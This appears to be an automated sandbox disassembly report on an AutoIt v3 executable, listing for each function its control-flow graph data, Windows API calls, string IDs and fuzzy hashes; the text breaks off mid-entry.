                                                                            control_flow_graph 1171 285d13-285d73 call 281207 GetVersionExW call 281821 1176 285e78-285e7a 1171->1176 1177 285d79 1171->1177 1179 2c0fa9-2c0fb5 1176->1179 1178 285d7c-285d81 1177->1178 1181 285e7f-285e80 1178->1181 1182 285d87 1178->1182 1180 2c0fb6-2c0fba 1179->1180 1183 2c0fbc 1180->1183 1184 2c0fbd-2c0fc9 1180->1184 1185 285d88-285dbf call 281981 call 28133d 1181->1185 1182->1185 1183->1184 1184->1180 1186 2c0fcb-2c0fd0 1184->1186 1194 2c1098-2c109b 1185->1194 1195 285dc5-285dc6 1185->1195 1186->1178 1188 2c0fd6-2c0fdd 1186->1188 1188->1179 1190 2c0fdf 1188->1190 1193 2c0fe4-2c0fea 1190->1193 1196 285e00-285e17 GetCurrentProcess IsWow64Process 1193->1196 1197 2c109d 1194->1197 1198 2c10b4-2c10b8 1194->1198 1199 2c0fef-2c0ffa 1195->1199 1200 285dcc-285dcf 1195->1200 1201 285e19 1196->1201 1202 285e1c-285e2d 1196->1202 1207 2c10a0 1197->1207 1203 2c10ba-2c10c3 1198->1203 1204 2c10a3-2c10ac 1198->1204 1205 2c0ffc-2c1002 1199->1205 1206 2c1017-2c1019 1199->1206 1200->1196 1208 285dd1-285def 1200->1208 1201->1202 1212 285e98-285ea2 GetSystemInfo 1202->1212 1213 285e2f-285e3f call 2855f0 1202->1213 1203->1207 1211 2c10c5-2c10c8 1203->1211 1204->1198 1214 2c100c-2c1012 1205->1214 1215 2c1004-2c1007 1205->1215 1209 2c103c-2c103f 1206->1209 1210 2c101b-2c1027 1206->1210 1207->1204 1208->1196 1216 285df1-285df7 1208->1216 1220 2c1065-2c1068 1209->1220 1221 2c1041-2c1050 1209->1221 1217 2c1029-2c102c 1210->1217 1218 2c1031-2c1037 1210->1218 1211->1204 1219 285e65-285e75 1212->1219 1228 285e8c-285e96 GetSystemInfo 1213->1228 1229 285e41-285e4e call 2855f0 1213->1229 1214->1196 1215->1196 1216->1193 1223 285dfd 1216->1223 1217->1196 1218->1196 1220->1196 1227 2c106e-2c1083 1220->1227 1224 2c105a-2c1060 1221->1224 1225 2c1052-2c1055 1221->1225 1223->1196 1224->1196 1225->1196 1230 2c108d-2c1093 1227->1230 1231 2c1085-2c1088 1227->1231 1232 285e56-285e5a 1228->1232 1236 285e50-285e54 GetNativeSystemInfo 1229->1236 1237 285e85-285e8a 1229->1237 1230->1196 1231->1196 1232->1219 1235 285e5c-285e5f FreeLibrary 1232->1235 1235->1219 1236->1232 1237->1236
                                                                            APIs
                                                                            • GetVersionExW.KERNEL32(?), ref: 00285D40
                                                                              • Part of subcall function 00281821: _memmove.LIBCMT ref: 0028185B
                                                                            • GetCurrentProcess.KERNEL32(?,00300A18,00000000,00000000,?), ref: 00285E07
                                                                            • IsWow64Process.KERNEL32(00000000), ref: 00285E0E
                                                                            • GetNativeSystemInfo.KERNEL32(00000000), ref: 00285E54
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00285E5F
                                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00285E90
                                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00285E9C
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                            • String ID:
                                                                            • API String ID: 1986165174-0
                                                                            • Opcode ID: c0c24afd0403238c33f38a6fb990f10c06ccd5c1b058a2838ec2a9795842b6c0
                                                                            • Instruction ID: e897d8546136e8cddbac3b93b8d5b818254f276f08cbdf368e66a5aa3dd5941b
                                                                            • Opcode Fuzzy Hash: c0c24afd0403238c33f38a6fb990f10c06ccd5c1b058a2838ec2a9795842b6c0
                                                                            • Instruction Fuzzy Hash: 3091173556ABD0DEC731DF7884515ABFFE56F2A300F880A5ED4C783A82D230A568C759
                                                                            Function 002D4005 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1279 2d4005-2d404c call 281207 * 3 call 290284 call 2d4fec 1290 2d405c-2d408d call 290119 FindFirstFileW 1279->1290 1291 2d404e-2d4057 call 281900 1279->1291 1295 2d40fc-2d4103 FindClose 1290->1295 1296 2d408f-2d4091 1290->1296 1291->1290 1297 2d4107-2d4129 call 281cb6 * 3 1295->1297 1296->1295 1298 2d4093-2d4098 1296->1298 1300 2d409a-2d40d5 call 281c9c call 2817e0 call 281900 DeleteFileW 1298->1300 1301 2d40d7-2d40e9 FindNextFileW 1298->1301 1300->1301 1314 2d40f3-2d40fa FindClose 1300->1314 1301->1296 1302 2d40eb-2d40f1 1301->1302 1302->1296 1314->1297
                                                                            APIs
                                                                              • Part of subcall function 00290284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00282A58,?,00008000), ref: 002902A4
                                                                              • Part of subcall function 002D4FEC: GetFileAttributesW.KERNEL32(?,002D3BFE), ref: 002D4FED
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 002D407C
                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 002D40CC
                                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 002D40DD
                                                                            • FindClose.KERNEL32(00000000), ref: 002D40F4
                                                                            • FindClose.KERNEL32(00000000), ref: 002D40FD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                            • String ID: \*.*
                                                                            • API String ID: 2649000838-1173974218
                                                                            • Opcode ID: f359e975859c80305b16d3a51023d359a030512043886c8c4130ad48996d06b5
                                                                            • Instruction ID: 333ca199e0a5adcf74a7503708641cdfdc4cfe533a586b588328db0b3b3e9b98
                                                                            • Opcode Fuzzy Hash: f359e975859c80305b16d3a51023d359a030512043886c8c4130ad48996d06b5
                                                                            • Instruction Fuzzy Hash: 18318F350293459BC305FF60D8919AFB7ACBE95301F400A1EF8D5822D2DB309D29CB53
                                                                            Function 002D4148 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 002D416D
                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 002D417B
                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 002D419B
                                                                            • CloseHandle.KERNEL32(00000000), ref: 002D4245
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                            • String ID:
                                                                            • API String ID: 420147892-0
                                                                            • Opcode ID: eef84552d9ecdebbbd7dce0dd7b4d81c9af606991a7a7a76118675f1ce0da8a3
                                                                            • Instruction ID: 7e508733715bb5acad70f0168dea3731e57c84fa876c1f4b8be706c8bd40523a
                                                                            • Opcode Fuzzy Hash: eef84552d9ecdebbbd7dce0dd7b4d81c9af606991a7a7a76118675f1ce0da8a3
                                                                            • Instruction Fuzzy Hash: AC318D751183419BD305EF50D885BAEBBECAF95350F40052EF985822E1EB709A69CB92
                                                                            Function 0027B020 Relevance: 5.6, APIs: 3, Instructions: 1146COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00283740: CharUpperBuffW.USER32(?,003371DC,00000002,?,00000000,003371DC,?,002753A5,?,?,?,?), ref: 0028375D
                                                                            • _memmove.LIBCMT ref: 0027B68A
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper_memmove
                                                                            • String ID:
                                                                            • API String ID: 2819905725-0
                                                                            • Opcode ID: 122cc302cb5febb4857a5c3c597d7ca5e62966500dc6b1206d59834a0a86093f
                                                                            • Instruction ID: 320f9a55277d4cb39b8dd0734a50ce66094cbd89bdbe137967ff5db45ffc9bbc
                                                                            • Opcode Fuzzy Hash: 122cc302cb5febb4857a5c3c597d7ca5e62966500dc6b1206d59834a0a86093f
                                                                            • Instruction Fuzzy Hash: D5A28875628342CFC721DF28C480B6AB7E1BF88304F14895DE89A8B261D771ED65CB82
                                                                            Function 002D494A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileAttributesW.KERNEL32(?,002BFC86), ref: 002D495A
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 002D496B
                                                                            • FindClose.KERNEL32(00000000), ref: 002D497B
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$AttributesCloseFirst
                                                                            • String ID:
                                                                            • API String ID: 48322524-0
                                                                            • Opcode ID: b2bccf379ee47cf74709a079da58a57cf508d38638c07ed7367daa0b62bd733b
                                                                            • Instruction ID: c5a3e1ad73a0f0890f9fa8a40ca5ab160d3f85725cbd4b71adbdc4c35cec4ee7
                                                                            • Opcode Fuzzy Hash: b2bccf379ee47cf74709a079da58a57cf508d38638c07ed7367daa0b62bd733b
                                                                            • Instruction Fuzzy Hash: A6E0DF31821506ABC2187B38EC1D9EA775C9F06339F100B07F835C22E0EBB09D5486D6
                                                                            Function 002794E0 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 247fd83532d0524f7bc0bc7ce9770fe589c53fd37bfd7d095acfe5435a6a1b50
                                                                            • Instruction ID: 2591c3259f1ab415c499dcc9ac6cfa9eb9456a7b487c780335083af2aa7605c9
                                                                            • Opcode Fuzzy Hash: 247fd83532d0524f7bc0bc7ce9770fe589c53fd37bfd7d095acfe5435a6a1b50
                                                                            • Instruction Fuzzy Hash: 1722AD74A20316CFDB24DF58C480AAEB7B4FF05300F14C169E95AAB351E771ADA5CB91
                                                                            Function 0027BC70 Relevance: 50.4, APIs: 22, Strings: 6, Instructions: 1379sleeptimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • timeGetTime.WINMM ref: 0027BF57
                                                                              • Part of subcall function 002752B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002752E6
                                                                            • Sleep.KERNEL32(0000000A,?,?), ref: 002B36B5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePeekSleepTimetime
                                                                            • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                                            • API String ID: 1792118007-922114024
                                                                            • Opcode ID: cf5db71f0987cc1755b7e82009a418491d83d8f7f214487848808aa8908bfa7a
                                                                            • Instruction ID: 25beef44c08a89a36990e96c1aacccfd93d77017ad8f061cb770832e5e10e323
                                                                            • Opcode Fuzzy Hash: cf5db71f0987cc1755b7e82009a418491d83d8f7f214487848808aa8908bfa7a
                                                                            • Instruction Fuzzy Hash: 32C2B270628342DFD729DF24C894BAAB7E5BF84344F14891DF48A972A1CB71E964CF42
                                                                            Function 002733E7 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 72windowregistryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00273444
                                                                            • RegisterClassExW.USER32(00000030), ref: 0027346E
                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0027347F
                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 0027349C
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002734AC
                                                                            • LoadIconW.USER32(000000A9), ref: 002734C2
                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002734D1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                            • API String ID: 2914291525-1005189915
                                                                            • Opcode ID: 57bb3bb933c3b1822791e9b1d4f37231d76e3d289fd3bad24158bd26170a8c2b
                                                                            • Instruction ID: c4f82fee5c0fa9dcf19268142e4965243186cdbd8b9605d257d34bc2bb94750b
                                                                            • Opcode Fuzzy Hash: 57bb3bb933c3b1822791e9b1d4f37231d76e3d289fd3bad24158bd26170a8c2b
                                                                            • Instruction Fuzzy Hash: C63167B1805309EFDB128FA4D889BC9BFF8FF09320F10415AE580EA2A0D7B90585CF50
                                                                            Function 00273411 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00273444
                                                                            • RegisterClassExW.USER32(00000030), ref: 0027346E
                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0027347F
                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 0027349C
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002734AC
                                                                            • LoadIconW.USER32(000000A9), ref: 002734C2
                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002734D1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                            • API String ID: 2914291525-1005189915
                                                                            • Opcode ID: c64db924f2b2db344bc3102308e171ae2ea4c58ec50a32ea33119241a855afa1
                                                                            • Instruction ID: 189411d0b449f663eb123fff44975e00c9005d82e91a9e08f3fe09f01517aef4
                                                                            • Opcode Fuzzy Hash: c64db924f2b2db344bc3102308e171ae2ea4c58ec50a32ea33119241a855afa1
                                                                            • Instruction Fuzzy Hash: 1921E3B1905308AFEB129FA4EC89BDEBBF8FB08710F00411AF914AA2A0D7B51544CF91
                                                                            Function 00282FC5 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 002900CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00283094), ref: 002900ED
                                                                              • Part of subcall function 002908C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,0028309F), ref: 002908E3
                                                                            • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 002830E2
                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 002C01BA
                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 002C01FB
                                                                            • RegCloseKey.ADVAPI32(?), ref: 002C0239
                                                                            • _wcscat.LIBCMT ref: 002C0292
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                            • API String ID: 2673923337-2727554177
                                                                            • Opcode ID: fe033e90f1453ba7356cbd56a439dc8cf10fa889080c204046b4979d124c4029
                                                                            • Instruction ID: 82067fa29f640d7d318b9e08bd48000d4a2db2722ccd9412970319d89c5b298a
                                                                            • Opcode Fuzzy Hash: fe033e90f1453ba7356cbd56a439dc8cf10fa889080c204046b4979d124c4029
                                                                            • Instruction Fuzzy Hash: 82715B7542A7019EC706EF25E8919ABBBACFF48340F40092EF845C31A0EF309969CF52
                                                                            Function 0028514C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00285156
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00285165
                                                                            • LoadIconW.USER32(00000063), ref: 0028517C
                                                                            • LoadIconW.USER32(000000A4), ref: 0028518E
                                                                            • LoadIconW.USER32(000000A2), ref: 002851A0
                                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 002851C6
                                                                            • RegisterClassExW.USER32(?), ref: 0028521C
                                                                              • Part of subcall function 00273411: GetSysColorBrush.USER32(0000000F), ref: 00273444
                                                                              • Part of subcall function 00273411: RegisterClassExW.USER32(00000030), ref: 0027346E
                                                                              • Part of subcall function 00273411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0027347F
                                                                              • Part of subcall function 00273411: InitCommonControlsEx.COMCTL32(?), ref: 0027349C
                                                                              • Part of subcall function 00273411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002734AC
                                                                              • Part of subcall function 00273411: LoadIconW.USER32(000000A9), ref: 002734C2
                                                                              • Part of subcall function 00273411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002734D1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                            • String ID: #$0$AutoIt v3
                                                                            • API String ID: 423443420-4155596026
                                                                            • Opcode ID: ed372400cd257b86ae7cad0c61a5a73b8fe5386cd696dccacf5f33f60d0e0ef6
                                                                            • Instruction ID: 17d206411c7bfbe41fe40054f1cb92ca7cb5cef0562836ab32c173d1eff40523
                                                                            • Opcode Fuzzy Hash: ed372400cd257b86ae7cad0c61a5a73b8fe5386cd696dccacf5f33f60d0e0ef6
                                                                            • Instruction Fuzzy Hash: 6C217CB0D15309AFEB22DFA4ED99B9E7BB8FB08710F00051AF504A62A1C7B65950DF84
                                                                            Function 002E5E1D Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 926 2e5e1d-2e5e54 call 274dc0 929 2e5e56-2e5e63 call 27502b 926->929 930 2e5e74-2e5e86 WSAStartup 926->930 929->930 939 2e5e65-2e5e70 call 27502b 929->939 931 2e5e9d-2e5edb call 2840cd call 274d37 call 28402a inet_addr gethostbyname 930->931 932 2e5e88-2e5e98 call 2c7135 930->932 947 2e5eec-2e5efc call 2c7135 931->947 948 2e5edd-2e5eea IcmpCreateFile 931->948 940 2e5ff6-2e5ffe 932->940 939->930 953 2e5fed-2e5ff1 call 281cb6 947->953 948->947 949 2e5f01-2e5f32 call 290fe6 call 28433f 948->949 958 2e5f34-2e5f53 IcmpSendEcho 949->958 959 2e5f55-2e5f69 IcmpSendEcho 949->959 953->940 960 2e5f6d-2e5f6f 958->960 959->960 961 2e5fa2-2e5fa4 960->961 962 2e5f71-2e5f76 960->962 963 2e5fa6-2e5fb2 call 2c7135 961->963 964 2e5fba-2e5fcc call 274dc0 962->964 965 2e5f78-2e5f7d 962->965 973 2e5fd4-2e5fe8 IcmpCloseHandle WSACleanup call 2845ae 963->973 974 2e5fce-2e5fd0 964->974 975 2e5fd2 964->975 968 2e5f7f-2e5f84 965->968 969 2e5fb4-2e5fb8 965->969 968->961 972 2e5f86-2e5f8b 968->972 969->963 976 2e5f8d-2e5f92 972->976 977 2e5f9a-2e5fa0 972->977 973->953 974->973 975->973 976->969 979 2e5f94-2e5f98 976->979 977->963 979->963
                                                                            APIs
                                                                            • WSAStartup.WS2_32(00000101,?), ref: 002E5E7E
                                                                            • inet_addr.WSOCK32(?,?,?), ref: 002E5EC3
                                                                            • gethostbyname.WS2_32(?), ref: 002E5ECF
                                                                            • IcmpCreateFile.IPHLPAPI ref: 002E5EDD
                                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 002E5F4D
                                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 002E5F63
                                                                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 002E5FD8
                                                                            • WSACleanup.WSOCK32 ref: 002E5FDE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
